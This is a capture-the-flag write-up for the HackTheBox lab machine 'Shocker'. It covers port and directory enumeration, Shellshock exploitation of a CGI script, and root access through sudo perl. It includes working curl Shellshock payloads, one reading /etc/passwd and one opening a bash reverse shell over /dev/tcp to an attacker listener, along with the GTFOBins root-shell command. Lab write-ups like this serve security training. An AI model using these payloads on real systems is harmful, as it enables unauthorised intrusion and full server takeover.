Enumeration
NMAP
─[us-vip-4]─[10.10.14.8]─[htb-ghohst@pwnbox-base]─[~]
└──╼ [★]$ nmap -sC -sV 10.10.10.56 > nmap.txt
─[us-vip-4]─[10.10.14.8]─[htb-ghohst@pwnbox-base]─[~]
└──╼ [★]$ cat nmap.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-23 22:59 BST
Nmap scan report for 10.10.10.56
Host is up (0.054s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.59 seconds
Visual
Navigated to the site (apache is running) and saw this:
Page source doesn’t contain a whole lot:
<!DOCTYPE html>
<html>
<body>
<h2>Don't Bug Me!</h2>
<img src="bug.jpg" alt="bug" style="width:450px;height:350px;">
</body>
</html>
GoBuster
Gobuster directory enumeration results in the following:
─[us-vip-4]─[10.10.14.14]─[htb-ghohst@pwnbox-base]─[~/Downloads]
└──╼ [★]$ gobuster dir -u http://10.10.10.56 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/06/24 21:32:32 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 290]
/.htpasswd (Status: 403) [Size: 295]
/.htaccess (Status: 403) [Size: 295]
/cgi-bin/ (Status: 403) [Size: 294]
/index.html (Status: 200) [Size: 137]
/server-status (Status: 403) [Size: 299]
Based on the below reading, I knew we were looking for a .sh file (assuming ShellShock) inside of /cgi-bin. I may have used a hammer here with the ‘big.txt’ wordlist, but it proved successful:
─[us-vip-4]─[10.10.14.14]─[htb-ghohst@pwnbox-base]─[~]
└──╼ [★]$ gobuster dir -e -u http://10.10.10.56/cgi-bin -w /usr/share/seclists/Discovery/Web-Content/big.txt -x sh,php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56/cgi-bin
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: sh,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2022/06/24 22:54:56 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.10.56/cgi-bin/.htpasswd (Status: 403) [Size: 303]
http://10.10.10.56/cgi-bin/.htaccess.php (Status: 403) [Size: 307]
http://10.10.10.56/cgi-bin/.htpasswd.sh (Status: 403) [Size: 306]
http://10.10.10.56/cgi-bin/.htaccess.sh (Status: 403) [Size: 306]
http://10.10.10.56/cgi-bin/.htaccess (Status: 403) [Size: 303]
http://10.10.10.56/cgi-bin/.htpasswd.php (Status: 403) [Size: 307]
http://10.10.10.56/cgi-bin/user.sh (Status: 200) [Size: 118]
===============================================================
2022/06/24 22:57:17 Finished
===============================================================
Reading
CGI-BIN is the only item here that looks unique and/or different. Performed some quick research and will attach that info here. Based on the version of apache and the name of the machine, we’ll start looking into ShellShock and related exploits.
What is a CGI-Bin? - Definition from Techopedia https://www.techopedia.com › … › DevOps › CGI-Bin A CGI-bin is a folder used to house scripts that will interact with a Web browser to provide functionality for a Web page or website.
CGI - HackTricks https://book.hacktricks.xyz › pentesting-web › cgi The CGI scripts are perl scripts, so, if you have compromised a server that … You could find this vulnerability noticing that it is using an old Apache …
Apache HTTP Server Path Traversal & Remote Code … https://blog.qualys.com › 2021/10/27 › apache-http-ser… Oct 27, 2021 — On October 4, 2021, Apache HTTP Server Project released Security advisory on a Path traversal and File disclosure vulnerability in Apache …
Apache mod_cgi - ‘Shellshock’ Remote Command Injection https://www.exploit-db.com › exploits Oct 6, 2014 — CVE-2014-6278 CVE-2014-6271 . remote exploit for Linux platform. … #!/usr/bin/env python from socket import * from threading import Thread …
Exploitation
From our previous gobuster results, we found ‘user.sh’. Navigating to http://10.10.10.56/cgi-bin/user.sh downloads the file successfully. GitHub Link to exploit and test environment
POC
From the github link above, we ran this command against the machine and it did, in fact, cat out the /etc/passwd file. This indicates that we should be able to initiate a reverse shell (or send through any other command) successfully.
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"
http://localhost:8080/cgi-bin/user.sh
FootHold
Pulled the syntax for a bash reverse shell from this Link after my regular nc IP PORT command didn’t take. I started netcat in a separate window and began the listener, ran this one through via my first terminal and confirmed a reverse shell.
─[us-vip-4]─[10.10.14.14]─[htb-ghohst@pwnbox-base]─[~/Downloads]
└──╼ [★]$ curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.14/4444 0>&1'" http://10.10.10.56/cgi-bin/user.sh
─[us-vip-4]─[10.10.14.14]─[htb-ghohst@pwnbox-base]─[/usr/share]
└──╼ [★]$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.56] 57980
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$
Navigated to ~, found user.txt, cat’d it out and submitted the flag.
Privilege Escalation
Started with a typical sudo -l and found we can run perl as root:
shelly@Shocker:/usr/lib/cgi-bin$ whoami
whoami
shelly
shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
Tried my hand at sudo perl -e /bin/bash but the syntax wasn’t right (obviously). Identified the correct syntax via GTFOBins
shelly@Shocker:/usr/lib/cgi-bin$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
sudo /usr/bin/perl -e 'exec "/bin/sh";'
whoami
root
Navigated to ~, cat’d out root.txt, submitted the flag.
Failures
SSH
Started with SSH and identified the following Exploit via searchsploit and exploit-db. Downloaded the script for later use. I don’t think it will be SSH as the aforementioned exploit mostly revolves around user enumeration.
We’ll maybe perform the user enumeration just in case. Running the script gives me a paramiko error, so we’ll get that installed as per the Site
pip install paramiko
Had to update the python script to utilize time.perf_counter() instead of time.clock() as it has been deprecated per this article Link
It seems like we’re getting way too many hits on usernames and perhaps this isn’t functioning as expected. I think I’m going to move on to apache enumeration, but we’ll hold on to this line for later if we want to revisit:
python3 40136.py -U /usr/share/SecLists/Usernames/Names/names.txt 10.10.10.56:2222 > username.txt &